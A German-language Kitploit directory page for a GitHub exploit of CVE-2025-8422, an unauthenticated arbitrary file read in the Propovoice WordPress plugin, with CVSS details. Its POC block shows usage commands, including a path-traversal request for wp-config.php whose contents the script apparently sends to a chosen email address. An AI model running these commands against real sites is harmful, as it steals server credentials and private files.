Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/randomrobbiebf/cve-2025-8422
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubrandomrobbiebf/cve-2025-8422

CVE-2025-8422

Propovoice <= 1.7.6.7 - Nicht authentifiziertes beliebiges Dateilesen

Repository anzeigen
vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-8422

Propovoice <= 1.7.6.7 - Nicht authentifiziertes beliebiges Dateilesen

Beschreibung

Das Propovoice: All-in-One Client Management System Plugin für WordPress ist in allen Versionen bis einschließlich 1.7.6.7 anfällig für beliebiges Dateilesen über die Funktion send_email(). Dies ermöglicht es nicht authentifizierten Angreifern, den Inhalt beliebiger Dateien auf dem Server zu lesen, die vertrauliche Informationen enthalten können.

Details

  • Typ: Plugin
  • Slug: propovoice
  • Betroffene Version: 1.7.6.7
  • CVSS-Score: 7.5
  • CVSS-Bewertung: Hoch
  • CVSS-Vektor: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • CVE: CVE-2025-8422
  • Status: Geschlossen

POC

root@kitploit:~
Verwendung: python3 cve-2025-8422-exploit.py <Ziel-URL> <E-Mail-Empfänger> [Zieldatei]

Beispiele:
  python3 cve-2025-8422-exploit.py https://example.com [email protected]
  python3 cve-2025-8422-exploit.py https://example.com [email protected] /../../../wp-config.php
Tool herunterladen